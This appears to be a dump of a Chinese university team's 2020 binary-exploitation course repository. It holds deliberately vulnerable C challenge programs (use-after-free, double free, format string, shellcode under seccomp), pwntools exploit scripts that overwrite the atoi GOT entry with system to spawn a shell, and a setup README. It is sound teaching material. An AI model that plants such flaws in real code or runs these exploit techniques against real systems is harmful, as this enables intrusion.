(ctx == NULL) 25 | goto out; 26 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(close), 0); 27 | if (rc < 0) 28 | goto out; 29 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); 30 | if (rc < 0) 31 | goto out; 32 | rc = seccomp_load(ctx); 33 | if (rc < 0) 34 | goto out; 35 | return 0; 36 | out: 37 | seccomp_release(ctx); 38 | return -1; 39 | } 40 | 41 | 42 | 43 | char bss_buf[0x20]; 44 | char flag[0x20]; 45 | 46 | int main(int argc, char** argv){ 47 | char buf[0x400]; 48 | int fd; 49 | if ((fd = open("./flag", O_RDONLY)) < 0) die("open flag error"); 50 | if (read(fd, flag, 0x40) <= 0) die("read flag error"); 51 | write(1, "input your shellcode\n", 21); 52 | int n = read(0, bss_buf, 0x20); 53 | 54 | init_seccomp(); 55 | 56 | void (* p)(void) = &bss_buf; 57 | p(); 58 | 59 | return 0; 60 | } 61 | -------------------------------------------------------------------------------- /src/03_format_string/fs1.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 fs1.c -no-pie -o fs1 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | int main(){ 12 | char buf[0x10]; 13 | 14 | // 传参方法 15 | printf("%d, %d, %d, %d, %d, %d, %d, %d\n", 1, 2, 3, 4, 5, 6, 7, 8); 16 | 17 | // 一些常见的 Flag characters 18 | printf( "a decimal number : %d\n" 19 | "a char : '%c'\n" 20 | "16 chars : \"%16c\"\n" 21 | "a pointer number : %p\n" 22 | "a hex number : %x\n", 123, 'h', 'a', &buf, 0xdeadbeef); 23 | 24 | // 存储已经输出的字符数量 25 | // int * 26 | int a = 0x12345678; 27 | printf("a is %#x\n", a); 28 | printf("abc%n\n", &a); 29 | printf("a is %#x\n", a); 30 | 31 | // short * 32 | a = 0x12345678; 33 | printf("a is %#x\n", a); 34 | printf("abc%hn\n", &a); 35 | printf("a is %#x\n", a); 36 | 37 | // char * 38 | a = 0x12345678; 39 | printf("a is %#x\n", a); 40 | printf("%16c%hhn\n", &a); 41 | printf("a is %#x\n", a); 42 | 43 | // 申明使用第几个参数 44 | printf("second number is %2$d\n", 111, 222); 45 | 46 | // 设置宽度 47 | printf("\n%5$*4$c\n", 1, 2, 3, 233, 'c'); 48 | 49 | // format string vuln 50 | int n = read(0, buf, 0x1f); 51 | buf[n] = 0; 52 | 53 | printf(buf); 54 | } -------------------------------------------------------------------------------- /src/05_heap/exp_heap3.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = 'amd64' 4 | context.terminal = ['tmux', 'split', '-h'] 5 | 6 | ru = lambda p, x : p.recvuntil(x) 7 | sn = lambda p, x : p.send(x) 8 | rl = lambda p : p.recvline() 9 | sl = lambda p, x : p.sendline(x) 10 | rv = lambda p, x=1024 : p.recv(numb = x) 11 | sa = lambda p, a, b : p.sendafter(a,b) 12 | sla = lambda p, a, b : p.sendlineafter(a,b) 13 | rr = lambda p, t : p.recvrepeat(t) 14 | rd = lambda p, x : p.recvuntil(x, drop=True) 15 | 16 | # io = gdb.debug(['./heap2'], "b 43\nc") 17 | 18 | io = process("./heap3") 19 | 20 | def choice(p, idx): 21 | sla(p, "choice : ", str(idx)) 22 | 23 | def add(p, idx, size): 24 | choice(p, 1) 25 | sla(p, "idx plz : ", str(idx)) 26 | sla(p, "size plz : ", str(size)) 27 | 28 | def rm(p, idx): 29 | choice(p, 2) 30 | sla(p, "idx plz : ", str(idx)) 31 | 32 | def show(p, idx): 33 | choice(p, 3) 34 | sla(p, "idx plz : ", str(idx)) 35 | 36 | def edit(p, idx, data): 37 | choice(p, 4) 38 | sla(p, "idx plz : ", str(idx)) 39 | sa(p, "content plz : ", data) 40 | 41 | 42 | add(io, 0, 0x60) 43 | add(io, 1, 0x60) 44 | add(io, 2, 0x60) 45 | rm(io, 0) 46 | rm(io, 1) 47 | rm(io, 0) 48 | 49 | fake = 0x602238 50 | 51 | add(io, 0, 0x60) 52 | edit(io, 0, p64(fake)) 53 | add(io, 1, 0x60) 54 | add(io, 3, 0x60) 55 | 56 | add(io, 4, 0x60) 57 | 58 | gdb.attach(io, "b 85") 59 | edit(io, 4, p32(0xdeadbeef)*20) 60 | 61 | choice(io, 5) 62 | 63 | io.interactive() -------------------------------------------------------------------------------- /src/02_shellcode/sc1_seccomp.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | 14 | void die(char *msg){ 15 | puts(msg); 16 | exit(-1); 17 | } 18 | 19 | int init_seccomp() { 20 | scmp_filter_ctx ctx; 21 | int rc = -1; 22 | ctx = seccomp_init(SCMP_ACT_KILL); 23 | if (ctx == NULL) 24 | goto out; 25 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0); 26 | if (rc < 0) 27 | goto out; 28 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0); 29 | if (rc < 0) 30 | goto out; 31 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(close), 0); 32 | if (rc < 0) 33 | goto out; 34 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); 35 | if (rc < 0) 36 | goto out; 37 | rc = seccomp_load(ctx); 38 | if (rc < 0) 39 | goto out; 40 | return 0; 41 | out: 42 | seccomp_release(ctx); 43 | return -1; 44 | } 45 | 46 | // sudo apt install libseccomp-dev 47 | // gcc ./sc1_seccomp.c -g -o sc1_seccomp -lseccomp 48 | int main(){ 49 | if (init_seccomp() != 0) 50 | die("init_seccomp failed"); 51 | char *binsh = "/bin/sh\0"; 52 | __asm__ ("mov $59, %%rax\n\t" 53 | "mov %0, %%rdi\n\t" 54 | "xor %%rsi, %%rsi\n\t" 55 | "xor %%rdx, %%rdx\n\t" 56 | "syscall\n\t" 57 | : 58 | : "r"(binsh) 59 | : "rax" 60 | ); 61 | return 0; 62 | } 63 | -------------------------------------------------------------------------------- /src/02_shellcode/sc3.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 -fno-stack-protector -z execstack -no-pie sc3.c -o sc3 -lseccomp 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | 15 | void die(char *msg){ 16 | puts(msg); 17 | exit(-1); 18 | } 19 | 20 | int init_seccomp() { 21 | scmp_filter_ctx ctx; 22 | int rc = -1; 23 | ctx = seccomp_init(SCMP_ACT_KILL); 24 | if (ctx == NULL) 25 | goto out; 26 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0); 27 | if (rc < 0) 28 | goto out; 29 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0); 30 | if (rc < 0) 31 | goto out; 32 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0); 33 | if (rc < 0) 34 | goto out; 35 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(close), 0); 36 | if (rc < 0) 37 | goto out; 38 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); 39 | if (rc < 0) 40 | goto out; 41 | rc = seccomp_load(ctx); 42 | if (rc < 0) 43 | goto out; 44 | return 0; 45 | out: 46 | seccomp_release(ctx); 47 | return -1; 48 | } 49 | 50 | 51 | char bss_buf[0x100]; 52 | 53 | int main(int argc, char** argv){ 54 | if (init_seccomp() != 0) die("init_seccomp failed"); 55 | char buf[0x70]; 56 | write(1, "input ur name plz\n", 18); 57 | int n = read(0, buf, 0x100); 58 | memcpy(bss_buf, buf, 0x100); 59 | write(1, "bye bye", 7); 60 | write(1, bss_buf, n); 61 | return 0; 62 | } 63 | -------------------------------------------------------------------------------- /src/05_heap/exp_heap4.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = 'amd64' 4 | context.terminal = ['tmux', 'split', '-h'] 5 | elf = ELF('./heap4') 6 | 7 | ru = lambda p, x : p.recvuntil(x) 8 | sn = lambda p, x : p.send(x) 9 | rl = lambda p : p.recvline() 10 | sl = lambda p, x : p.sendline(x) 11 | rv = lambda p, x=1024 : p.recv(numb = x) 12 | sa = lambda p, a, b : p.sendafter(a,b) 13 | sla = lambda p, a, b : p.sendlineafter(a,b) 14 | rr = lambda p, t : p.recvrepeat(t) 15 | rd = lambda p, x : p.recvuntil(x, drop=True) 16 | 17 | # io = gdb.debug(['./heap4'], "b 43\nc") 18 | 19 | io = process("./heap4") 20 | 21 | def choice(p, idx): 22 | sla(p, "choice : ", str(idx)) 23 | 24 | def add(p, idx, size): 25 | choice(p, 1) 26 | sla(p, "idx plz : ", str(idx)) 27 | sla(p, "size plz : ", str(size)) 28 | 29 | def rm(p, idx): 30 | choice(p, 2) 31 | sla(p, "idx plz : ", str(idx)) 32 | 33 | def show(p, idx): 34 | choice(p, 3) 35 | sla(p, "idx plz : ", str(idx)) 36 | 37 | def edit(p, idx, data): 38 | choice(p, 4) 39 | sla(p, "idx plz : ", str(idx)) 40 | sa(p, "content plz : ", data) 41 | 42 | 43 | add(io, 0, 0x100) 44 | add(io, 1, 0x60) 45 | add(io, 2, 0x60) 46 | add(io, 3, 0x60) 47 | rm(io, 0) 48 | show(io, 0) 49 | 50 | libc_addr = u64(rv(io, 6)+b'\0\0') 51 | 52 | print("libc_addr : " + hex(libc_addr)) 53 | libc = elf.libc 54 | libc.address = libc_addr - 0x3c4b78 55 | 56 | print("libc.address : " + hex(libc.address)) 57 | 58 | fake = 0x6020c8 59 | add(io, 4, 0x71) 60 | 61 | rm(io, 2) 62 | edit(io, 2, p64(fake)) 63 | add(io, 2, 0x60) 64 | add(io, 1, 0x60) 65 | 66 | edit(io, 1, flat(0x100, elf.got['atoi'])) 67 | 68 | edit(io, 0, p64(libc.symbols['system'])) 69 | 70 | choice(io, "/bin/sh\0") 71 | 72 | # gdb.attach(io) 73 | 74 | io.interactive() -------------------------------------------------------------------------------- /src/05_heap/heap2.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 -g -no-pie heap2.c -o heap2 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | void die(char *msg){ 10 | puts(msg); 11 | exit(-1); 12 | } 13 | 14 | void *ptrs[0x10]; 15 | 16 | 17 | 18 | int get_int(){ 19 | // puts("") 20 | char buf[0x10] = {0}; 21 | read(0, buf, 0x0f); 22 | return atoi(buf); 23 | } 24 | 25 | int menu(){ 26 | puts("1. add"); 27 | puts("2. rm"); 28 | puts("3. show"); 29 | puts("4. edit"); 30 | puts("5. exit"); 31 | printf("input your choice : "); 32 | return get_int(); 33 | } 34 | 35 | 36 | int main(){ 37 | setbuf(stdin, 0); 38 | setbuf(stdout, 0); 39 | setbuf(stderr, 0); 40 | // test_chunk(); 41 | int choice; 42 | while ((choice = menu()) != 5) { 43 | if (choice == 1) { 44 | printf("input idx plz : "); 45 | unsigned int idx = get_int(); 46 | if (0x10 <= idx ) die("wrong idx"); 47 | printf("input size plz : "); 48 | unsigned int size = get_int(); 49 | void *ptr = malloc(size); 50 | if (ptr == NULL) die("malloc error"); 51 | ptrs[idx] = ptr; 52 | } else if (choice == 2) { 53 | printf("input idx plz : "); 54 | unsigned int idx = get_int(); 55 | if (0x10 <= idx ) die("wrong idx"); 56 | free(ptrs[idx]); // uaf 57 | } else if (choice == 3){ 58 | printf("input idx plz : "); 59 | unsigned int idx = get_int(); 60 | if (0x10 <= idx ) die("wrong idx"); 61 | puts(ptrs[idx]); 62 | } else if (choice == 4){ 63 | puts("un implemented yet"); 64 | } else { 65 | puts("wrong choice"); 66 | } 67 | } 68 | return 0; 69 | } -------------------------------------------------------------------------------- /src/05_heap/exp_heap5.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = 'amd64' 4 | context.terminal = ['tmux', 'split', '-h'] 5 | elf = ELF('./heap5') 6 | 7 | ru = lambda p, x : p.recvuntil(x) 8 | sn = lambda p, x : p.send(x) 9 | rl = lambda p : p.recvline() 10 | sl = lambda p, x : p.sendline(x) 11 | rv = lambda p, x=1024 : p.recv(numb = x) 12 | sa = lambda p, a, b : p.sendafter(a,b) 13 | sla = lambda p, a, b : p.sendlineafter(a,b) 14 | rr = lambda p, t : p.recvrepeat(t) 15 | rd = lambda p, x : p.recvuntil(x, drop=True) 16 | 17 | # io = gdb.debug(['./heap5'], "b 43\nc") 18 | 19 | io = process("./heap5") 20 | 21 | def choice(p, idx): 22 | sla(p, "choice : ", str(idx)) 23 | 24 | def add(p, idx, size): 25 | choice(p, 1) 26 | sla(p, "idx plz : ", str(idx)) 27 | sla(p, "size plz : ", str(size)) 28 | 29 | def rm(p, idx): 30 | choice(p, 2) 31 | sla(p, "idx plz : ", str(idx)) 32 | 33 | def show(p, idx): 34 | choice(p, 3) 35 | sla(p, "idx plz : ", str(idx)) 36 | 37 | def edit(p, idx, data): 38 | choice(p, 4) 39 | sla(p, "idx plz : ", str(idx)) 40 | sa(p, "content plz : ", data) 41 | 42 | 43 | add(io, 0, 0x100) 44 | add(io, 1, 0x100) 45 | rm(io, 0) 46 | show(io, 0) 47 | 48 | libc_addr = u64(rv(io, 6)+b'\0\0') 49 | 50 | print("libc_addr : " + hex(libc_addr)) 51 | libc = elf.libc 52 | libc.address = libc_addr - 0x3c4b78 53 | print("libc.address : " + hex(libc.address)) 54 | 55 | rm(io, 1) 56 | 57 | add(io, 0, 0x110) 58 | add(io, 2, 0xf0) 59 | add(io, 3, 0xf0) 60 | add(io, 4, 0xf0) 61 | 62 | # into unsorted bin 63 | rm(io, 2) 64 | 65 | # into small bin 66 | add(io, 7, 0x200) 67 | 68 | p_addr = 0x6020E8 69 | 70 | #change fd and bk 71 | edit(io, 2, flat(p_addr - 0x18, p_addr - 0x10)) 72 | 73 | # gdb.attach(io, "b free") 74 | # unlink 75 | rm(io, 3) 76 | 77 | edit(io, 1, flat(0x100, 0x100, elf.got['atoi'])) 78 | 79 | edit(io, 0, p64(libc.symbols['system'])) 80 | 81 | # gdb.attach(io) 82 | 83 | choice(io, "/bin/sh;") 84 | 85 | io.interactive() -------------------------------------------------------------------------------- /src/05_heap/heap4.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 -g -no-pie heap4.c -o heap4 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | void die(char *msg){ 10 | puts(msg); 11 | exit(-1); 12 | } 13 | 14 | #define MAX_PTRS 8 15 | 16 | void *ptrs[MAX_PTRS]; 17 | int sizes[MAX_PTRS]; 18 | 19 | 20 | 21 | int get_int(){ 22 | char buf[0x10] = {0}; 23 | read(0, buf, 0x0f); 24 | return atoi(buf); 25 | } 26 | 27 | int menu(){ 28 | puts("1. add"); 29 | puts("2. rm"); 30 | puts("3. show"); 31 | puts("4. edit"); 32 | puts("5. exit"); 33 | printf("input your choice : "); 34 | return get_int(); 35 | } 36 | 37 | unsigned int get_idx(){ 38 | printf("input idx plz : "); 39 | unsigned int idx = get_int(); 40 | if (MAX_PTRS <= idx ) die("wrong idx"); 41 | return idx; 42 | } 43 | 44 | unsigned int get_size(){ 45 | printf("input size plz : "); 46 | return get_int(); 47 | } 48 | 49 | 50 | int main(){ 51 | setbuf(stdin, 0); 52 | setbuf(stdout, 0); 53 | setbuf(stderr, 0); 54 | // test_chunk(); 55 | int choice; 56 | 57 | while ((choice = menu()) != 5) { 58 | if (choice == 1) { 59 | int idx = get_idx(); 60 | int size = get_size(); 61 | void *ptr = malloc(size); 62 | if (ptr == NULL) die("malloc error"); 63 | ptrs[idx] = ptr; 64 | sizes[idx] = size; 65 | } else if (choice == 2) { 66 | int idx = get_idx(); 67 | free(ptrs[idx]); 68 | } else if (choice == 3){ 69 | int idx = get_idx(); 70 | if (0x10 <= idx ) die("wrong idx"); 71 | puts(ptrs[idx]); 72 | } else if (choice == 4){ 73 | int idx = get_idx(); 74 | printf("input content plz : "); 75 | if (read(0, ptrs[idx], sizes[idx]) < 0) die("read error"); 76 | } else { 77 | puts("wrong choice"); 78 | } 79 | } 80 | return 0; 81 | } -------------------------------------------------------------------------------- /src/05_heap/heap5.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 -g -no-pie heap5.c -o heap5 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | void die(char *msg){ 10 | puts(msg); 11 | exit(-1); 12 | } 13 | 14 | #define MAX_PTRS 8 15 | 16 | void *ptrs[MAX_PTRS]; 17 | int sizes[MAX_PTRS]; 18 | 19 | 20 | 21 | int get_int(){ 22 | char buf[0x10] = {0}; 23 | read(0, buf, 0x0f); 24 | return atoi(buf); 25 | } 26 | 27 | int menu(){ 28 | puts("1. add"); 29 | puts("2. rm"); 30 | puts("3. show"); 31 | puts("4. edit"); 32 | puts("5. exit"); 33 | printf("input your choice : "); 34 | return get_int(); 35 | } 36 | 37 | unsigned int get_idx(){ 38 | printf("input idx plz : "); 39 | unsigned int idx = get_int(); 40 | if (MAX_PTRS <= idx ) die("wrong idx"); 41 | return idx; 42 | } 43 | 44 | unsigned int get_size(){ 45 | printf("input size plz : "); 46 | unsigned int size = get_int(); 47 | if (size <= 0x80) die("wrong size"); 48 | return size; 49 | } 50 | 51 | 52 | int main(){ 53 | setbuf(stdin, 0); 54 | setbuf(stdout, 0); 55 | setbuf(stderr, 0); 56 | // test_chunk(); 57 | int choice; 58 | 59 | while ((choice = menu()) != 5) { 60 | if (choice == 1) { 61 | int idx = get_idx(); 62 | int size = get_size(); 63 | void *ptr = malloc(size); 64 | if (ptr == NULL) die("malloc error"); 65 | ptrs[idx] = ptr; 66 | sizes[idx] = size; 67 | } else if (choice == 2) { 68 | int idx = get_idx(); 69 | free(ptrs[idx]); 70 | } else if (choice == 3){ 71 | int idx = get_idx(); 72 | if (0x10 <= idx ) die("wrong idx"); 73 | puts(ptrs[idx]); 74 | } else if (choice == 4){ 75 | int idx = get_idx(); 76 | printf("input content plz : "); 77 | if (read(0, ptrs[idx], sizes[idx]) < 0) die("read error"); 78 | } else { 79 | puts("wrong choice"); 80 | } 81 | } 82 | return 0; 83 | } -------------------------------------------------------------------------------- /src/05_heap/heap6.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 -g -no-pie heap6.c -o heap6 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | void die(char *msg){ 10 | puts(msg); 11 | exit(-1); 12 | } 13 | 14 | #define MAX_PTRS 0x20 15 | 16 | void *ptrs[MAX_PTRS]; 17 | 18 | long long magics[0x100]; 19 | // long long magic; 20 | 21 | int get_int(){ 22 | char buf[0x10] = {0}; 23 | read(0, buf, 0x0f); 24 | return atoi(buf); 25 | } 26 | 27 | int menu(){ 28 | puts("1. add"); 29 | puts("2. rm"); 30 | puts("3. show"); 31 | puts("4. edit"); 32 | puts("5. exit"); 33 | printf("input your choice : "); 34 | return get_int(); 35 | } 36 | 37 | unsigned int get_idx(){ 38 | printf("input idx plz : "); 39 | unsigned int idx = get_int(); 40 | if (MAX_PTRS <= idx ) die("wrong idx"); 41 | return idx; 42 | } 43 | 44 | unsigned int get_size(){ 45 | printf("input size plz : "); 46 | unsigned int size = get_int(); 47 | if (size <= 0x80) die("wrong size"); 48 | return size; 49 | } 50 | 51 | 52 | int main(){ 53 | setbuf(stdin, 0); 54 | setbuf(stdout, 0); 55 | setbuf(stderr, 0); 56 | // test_chunk(); 57 | int choice; 58 | 59 | while ((choice = menu()) != 5) { 60 | if (choice == 1) { 61 | int idx = get_idx(); 62 | int size = get_size(); 63 | void *ptr = malloc(size); 64 | if (ptr == NULL) die("malloc error"); 65 | ptrs[idx] = ptr; 66 | } else if (choice == 2) { 67 | int idx = get_idx(); 68 | free(ptrs[idx]); 69 | } else if (choice == 3){ 70 | puts("unimplemented yet"); 71 | } else if (choice == 4){ 72 | puts("unimplemented yet"); 73 | int idx = get_idx(); 74 | printf("input content plz : "); 75 | if (read(0, ptrs[idx], 0x10) < 0) die("read error"); 76 | } else { 77 | puts("wrong choice"); 78 | } 79 | } 80 | if (magics[0xff] > 0x7f0000000000) 81 | system("/bin/sh"); 82 | return 0; 83 | } -------------------------------------------------------------------------------- /src/05_heap/heap3.c: -------------------------------------------------------------------------------- 1 | // gcc -O0 -g -no-pie heap3.c -o heap3 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | void die(char *msg){ 10 | puts(msg); 11 | exit(-1); 12 | } 13 | 14 | #define MAX_PTRS 0x80 15 | 16 | void *ptrs[MAX_PTRS]; 17 | int sizes[MAX_PTRS]; 18 | 19 | 20 | 21 | int get_int(){ 22 | char buf[0x10] = {0}; 23 | read(0, buf, 0x0f); 24 | return atoi(buf); 25 | } 26 | 27 | int menu(){ 28 | puts("1. add"); 29 | puts("2. rm"); 30 | puts("3. show"); 31 | puts("4. edit"); 32 | puts("5. exit"); 33 | printf("input your choice : "); 34 | return get_int(); 35 | } 36 | 37 | unsigned int get_idx(){ 38 | printf("input idx plz : "); 39 | unsigned int idx = get_int(); 40 | if (MAX_PTRS <= idx ) die("wrong idx"); 41 | return idx; 42 | } 43 | 44 | unsigned int get_size(){ 45 | printf("input size plz : "); 46 | return get_int(); 47 | } 48 | 49 | 50 | int main(){ 51 | setbuf(stdin, 0); 52 | setbuf(stdout, 0); 53 | setbuf(stderr, 0); 54 | // test_chunk(); 55 | int choice; 56 | 57 | sizes[0x60] = 0x7f; 58 | while ((choice = menu()) != 5) { 59 | if (choice == 1) { 60 | int idx = get_idx(); 61 | if (sizes[idx] != 0) continue; 62 | int size = get_size(); 63 | void *ptr = malloc(size); 64 | if (ptr == NULL) die("malloc error"); 65 | ptrs[idx] = ptr; 66 | sizes[idx] = size; 67 | } else if (choice == 2) { 68 | int idx = get_idx(); 69 | free(ptrs[idx]); // uaf 70 | sizes[idx] = 0; 71 | } else if (choice == 3){ 72 | int idx = get_idx(); 73 | if (sizes[idx] == 0) continue; 74 | if (0x10 <= idx ) die("wrong idx"); 75 | puts(ptrs[idx]); 76 | } else if (choice == 4){ 77 | int idx = get_idx(); 78 | if (sizes[idx] == 0) continue; 79 | printf("input content plz : "); 80 | if (read(0, ptrs[idx], sizes[idx]) < 0) die("read error"); 81 | } else { 82 | puts("wrong choice"); 83 | } 84 | } 85 | if (sizes[0x66] == 0xdeadbeef) { 86 | system("/bin/sh"); 87 | } 88 | return 0; 89 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | - [1. Lilac_2020_summer_pwn](#1-lilac_2020_summer_pwn) 4 | - [2. 源码对应知识点](#2-源码对应知识点) 5 | - [2.1. stack 文件夹:](#21-stack-文件夹) 6 | - [2.2. shellcode 文件夹:](#22-shellcode-文件夹) 7 | - [2.3. format_string 文件夹:](#23-format_string-文件夹) 8 | - [2.4. dynamic_link 文件夹:](#24-dynamic_link-文件夹) 9 | - [2.5. 常见漏洞类型](#25-常见漏洞类型) 10 | - [2.6. 堆入门](#26-堆入门) 11 | - [2.7. iofile](#27-iofile) 12 | - [2.8. 堆进阶](#28-堆进阶) 13 | - [3. 环境配置](#3-环境配置) 14 | - [3.1. 基本环境](#31-基本环境) 15 | - [3.2. 学习资源](#32-学习资源) 16 | 17 | 18 | 19 | # 1. Lilac_2020_summer_pwn 20 | 21 | Lilac 2020 暑期pwn培训课件以及相关文件 22 | 23 | 开始上课之前需要安装一些软件并配置一些环境. 具体软件及配置方法参考[3. 环境配置](#3-环境配置) 24 | 25 | 培训录屏会上传到[B站频道](https://space.bilibili.com/40145638/channel/detail?cid=145242) 26 | 27 | 本仓库中: 28 | - `slides` 文件夹中为课件(*.pptx). 29 | - `src` 文件夹中为讲课过程中用到的练习题源码及对应exp. 30 | 31 | 32 | # 2. 源码对应知识点 33 | 34 | ## 2.1. stack 文件夹: 35 | 36 | 栈溢出相关练习题 37 | 38 | 1. stack1.c: 覆盖局部变量 39 | 2. stack2.c: 覆盖返回地址到后门函数 40 | 3. stack3.c: 覆盖返回地址到后门函数, 并利用rop控制参数. 41 | 4. stack4.c: 提供后门函数栈地址, 但是只能覆盖到 rbp. 需要进行栈迁移+rop 42 | 5. stack5.c: 没有后门函数, 提供了libc中某个函数地址, 需要计算system地址, 并覆盖返回地址到system 43 | 44 | 45 | ## 2.2. shellcode 文件夹: 46 | 47 | shellcode 相关练习题 48 | 49 | 1. sc1.c: 使用syscall get shell 50 | 1. sc1_seccomp.c: 加了seccomp规则之后无法使用syscall get shell 51 | 2. sc2.c: ret2shellcode 52 | 3. sc3.c: orwshellcode 53 | 4. sc4.c: printable shellcode 54 | 5. sc5.c: 侧信道 leak flag 55 | 56 | 57 | ## 2.3. format_string 文件夹: 58 | 59 | 格式化字符串(format string) 相关练习题 60 | 61 | 1. fs1.c: printf的一些基本用法 62 | 2. fs2.c: 利用格式化字符串漏洞泄露栈上的变量 63 | 3. fs3.c: 利用格式化字符漏洞修改栈上的变量 64 | 4. fs4.c: 利用格式化字符漏洞修改返回地址指向后门函数 65 | 66 | ## 2.4. dynamic_link 文件夹: 67 | 68 | 动态链接(plt表和got表) 69 | 70 | 1. dl1.c: 调用两个libc函数, 用以展示动态链接的过程 71 | 2. dl2.c: 栈溢出, 泄露got表中的libc地址, 然后ret2libc 72 | 3. dl3.c: 修改 got表中atoi项为system地址. 然后getshell 73 | 74 | ## 2.5. 常见漏洞类型 75 | 76 | todo 77 | 78 | ## 2.6. 堆入门 79 | 80 | 1. heap1.c: 熟悉相关函数以及结构体 81 | 2. heap2.c: 利用use-after-free漏洞泄露地址 82 | 3. heap3.c: double free + fastbin attack 83 | 4. heap4.c: uaf leak + fastbin attack get shell 84 | 5. heap5.c: unlink 85 | 6. heap6.c: unsorted bin attack 86 | 87 | ## 2.7. iofile 88 | 89 | TODO 90 | 91 | 1. leak libc 92 | 2. 93 | 94 | ## 2.8. 堆进阶 95 | 96 | TODO 97 | 98 | 1. 堆溢出 99 | 2. off-by-one 100 | 3. __malloc_hook, __realloc_hook, __free_hook, one_gadget 101 | 4. tcache attack 102 | 103 | # 3. 环境配置 104 | 105 | ## 3.1. 基本环境 106 | 107 | pwn题通常都是linux系统下的可执行文件, 所以学pwn的话需要有一个linux系统, 如果你的操作系统是windows或者 OSX 的话建议先安装一个虚拟机软件, 然后在虚拟机里面装一个linux系统. 推荐使用ubuntu系统, 本次培训过程中默认大家的环境都是 ubuntu 16.04. 所以如果你用的linux不是 ubuntu 的话建议也装一个虚拟机或者使用 docker. 108 | 109 | 同时分析可执行文件的过程中需要用到一些软件. 比如使用 IDA 进行静态分析. 使用 gdb 进行动态调试. 下面列出一些可能会用到的软件 110 | 111 | 1. IDA: 自行搜索 112 | 2. 虚拟机软件: 113 | 1. vmware: 该软件正版需要花钱买, 想用这个的自行搜索吧. 114 | 2. virtual box: 开源免费. https://www.virtualbox.org/wiki/Downloads 115 | 3. ubuntu系统镜像下载地址: 116 | 1. https://mirrors.tuna.tsinghua.edu.cn/ubuntu-releases/16.04.6/ubuntu-16.04.6-desktop-amd64.iso 117 | 118 | *本次培训过程中讲师使用的环境为virtualbox下ubuntu 16.04* 119 | 120 | *在虚拟机中安装ubuntu的方法自行搜索,不再赘述.安装好系统之后最好配置一下共享文件夹, 这样的话windows和linux之间传输文件就比较方便* 121 | 122 | ## 3.2. 学习资源 123 | 124 | pwn题拿到的通常是一个linux下的可执行文件, 其中包含了一些漏洞, 选手需要经过一些逆向操作来弄懂程序的运行逻辑, 进而发现并利用漏洞. 如果写过c语言了解程序编译成可执行文件的过程的话就应该知道可执行文件主要是由机器码组成的, 和机器码一一对应的是汇编代码, 大概长这样. 125 | 126 | ```asm 127 | .LC0: 128 | .string "hello world!" 129 | mian: 130 | push rbp 131 | mov rbp, rsp 132 | mov edi, OFFSET FLAT:.LC0 133 | call puts 134 | mov eax, 0 135 | pop rbp 136 | ret 137 | ``` 138 | 139 | 这儿有一个网站可以查看各种高级语言(c/c++等)编译得到的汇编语言, 上面的汇编语言就是下面这段c语言代码编译得到的. 140 | 141 | ```c 142 | // Type your code here, or load an example. 143 | int mian(){ 144 | puts("hello world!"); 145 | return 0; 146 | } 147 | ``` 148 | 网站地址: [https://godbolt.org/](https://godbolt.org/) 149 | 150 | 所以我们要想弄懂程序的运行逻辑的话就需要具有基本的汇编代码的阅读能力. 关于汇编语言的学习可以参考 王爽的 <<汇编语言>> 一书. (不用全看完, 可以看懂常见汇编指令即可) 151 | 152 | 153 | 在利用漏洞的过程中, 我们通常需要写一些自动化利用脚本, 通常使用python语言, 所以需要了解一下python的基本语法. 网上关于python的教程很多, 这儿提供一个[教程](https://www.runoob.com/python/python-tutorial.html) 154 | 155 | 在做题的过程中需要离不开linux系统, 所以希望大家在装好ubuntu之后可以熟悉一下linux系统的基本操作.(主要是shell下的一些命令), 可以参考一下这个教程: https://zhuanlan.zhihu.com/p/36801617 156 | 157 | 在动态分析题目的过程中我们往往需要使用gdb调试题目文件, 但是gdb如果不装插件的话极其难用, 所以强烈推荐大家装个插件, 常用的插件由三个. 158 | 159 | 1. peda: https://github.com/longld/peda (安装简单/提供了一些基础功能, 本次培训堆之前的课程都使用该插件) 160 | 2. gef: https://github.com/hugsy/gef (没用过不评价) 161 | 3. pwndbg: http://pwnwndbg.com/ (安装比较麻烦, 但是功能强大, 对堆支持比较完善) 162 | 163 | 在写利用脚本的过程中会用到python的一个库 `pwntools`, 大家可以自行安装之后体验一番. 安装方式参考官网: 